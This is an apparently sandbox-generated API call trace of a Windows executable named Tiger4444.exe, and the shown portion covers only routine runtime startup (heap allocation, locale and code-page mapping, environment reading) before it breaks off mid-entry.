# Flog Txt Version 1 # Analyzer Version: 3.0.2 # Analyzer Build Date: May 15 2019 18:28:42 # Log Creation Date: 18.05.2019 06:39:08.117 Process: id = "1" image_name = "tiger4444.exe" filename = "c:\\users\\fd1hvy\\desktop\\tiger4444.exe" page_root = "0x628ba000" os_pid = "0xda8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\FD1HVy\\Desktop\\Tiger4444.exe\" " cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:000103c1" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0xdbc [0030.062] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0030.062] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x74ea0000 [0030.063] GetProcAddress (hModule=0x74ea0000, lpProcName="InitializeCriticalSectionEx") returned 0x74f97060 [0030.063] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x74ea0000 [0030.063] GetProcAddress (hModule=0x74ea0000, lpProcName="FlsAlloc") returned 0x74f9bea0 [0030.064] GetProcAddress (hModule=0x74ea0000, lpProcName="FlsSetValue") returned 0x74f92550 [0030.064] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x74ea0000 [0030.065] GetProcAddress (hModule=0x74ea0000, lpProcName="InitializeCriticalSectionEx") returned 0x74f97060 [0030.065] GetProcessHeap () returned 0xc50000 [0030.065] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x74ea0000 [0030.065] GetProcAddress (hModule=0x74ea0000, lpProcName="FlsAlloc") returned 0x74f9bea0 [0030.065] GetLastError () returned 0xcb [0030.065] GetProcAddress (hModule=0x74ea0000, lpProcName="FlsGetValue") returned 0x74f870c0 [0030.065] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x364) returned 0xc6d270 [0030.065] GetProcAddress (hModule=0x74ea0000, lpProcName="FlsSetValue") returned 0x74f92550 [0030.065] SetLastError (dwErrCode=0xcb) [0030.065] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0xc00) returned 0xc6e720 [0030.080] GetStartupInfoW (in: lpStartupInfo=0xaffdb8 | out: lpStartupInfo=0xaffdb8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\FD1HVy\\Desktop\\Tiger4444.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0030.080] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0030.080] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0030.080] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0030.080] GetCommandLineA () returned="\"C:\\Users\\FD1HVy\\Desktop\\Tiger4444.exe\" " [0030.080] GetCommandLineW () returned="\"C:\\Users\\FD1HVy\\Desktop\\Tiger4444.exe\" " [0030.080] GetLastError () returned 0xcb [0030.080] SetLastError (dwErrCode=0xcb) [0030.080] GetLastError () returned 0xcb [0030.080] SetLastError (dwErrCode=0xcb) [0030.081] GetACP () returned 0x4e4 [0030.081] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x220) returned 0xc6bf28 [0030.081] IsValidCodePage (CodePage=0x4e4) returned 1 [0030.081] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0xaffde8 | out: lpCPInfo=0xaffde8) returned 1 [0030.081] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0xaff6b0 | out: lpCPInfo=0xaff6b0) returned 1 [0030.081] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xaffcc4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0030.081] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xaffcc4, cbMultiByte=256, lpWideCharStr=0xaff448, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0030.081] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0xaff6c4 | out: lpCharType=0xaff6c4) returned 1 [0030.081] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xaffcc4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0030.081] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xaffcc4, cbMultiByte=256, lpWideCharStr=0xaff3f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0030.081] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x74ea0000 [0030.081] GetProcAddress (hModule=0x74ea0000, lpProcName="LCMapStringEx") returned 0x74f7ed00 [0030.081] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0030.081] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0xaff1e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0030.081] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0xaffbc4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xf6\xb4\xfe\x0b", lpUsedDefaultChar=0x0) returned 256 [0030.081] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xaffcc4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0030.081] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xaffcc4, cbMultiByte=256, lpWideCharStr=0xaff418, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0030.081] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0030.081] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0xaff208, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0030.081] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0xaffac4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xf6\xb4\xfe\x0b", lpUsedDefaultChar=0x0) returned 256 [0030.081] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x80) returned 0xc566f8 [0030.081] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x3ebb0, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\Tiger4444.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\tiger4444.exe")) returned 0x25 [0030.081] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x2e) returned 0xc674f0 [0030.081] RtlInitializeSListHead (in: ListHead=0x3eae0 | out: ListHead=0x3eae0) [0030.081] GetLastError () returned 0x0 [0030.081] SetLastError (dwErrCode=0x0) [0030.081] GetEnvironmentStringsW () returned 0xc6f328* [0030.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0030.082] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x565) returned 0xc6fe00 [0030.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0xc6fe00, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0030.082] FreeEnvironmentStringsW (penv=0xc6f328) returned 1 [0030.082] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x94) returned 0xc5e848 [0030.082] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x1f) returned 0xc5adf0 [0030.082] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x28) returned 0xc65718 [0030.082] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x37) returned 0xc62f28 [0030.082] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x3c) returned 0xc623b0 [0030.082] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x31) returned 0xc62ea8 [0030.082] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x14) returned 0xc667a0 [0030.082] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x24) returned 0xc657a8 [0030.082] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0xd) returned 0xc6d0c0 [0030.082] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x17) returned 0xc66a80 [0030.082] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x2b) returned 0xc67bb8 [0030.082] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x15) returned 0xc66960 [0030.082] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x17) returned 0xc66a60 [0030.082] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x22) returned 0xc65688 [0030.082] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, 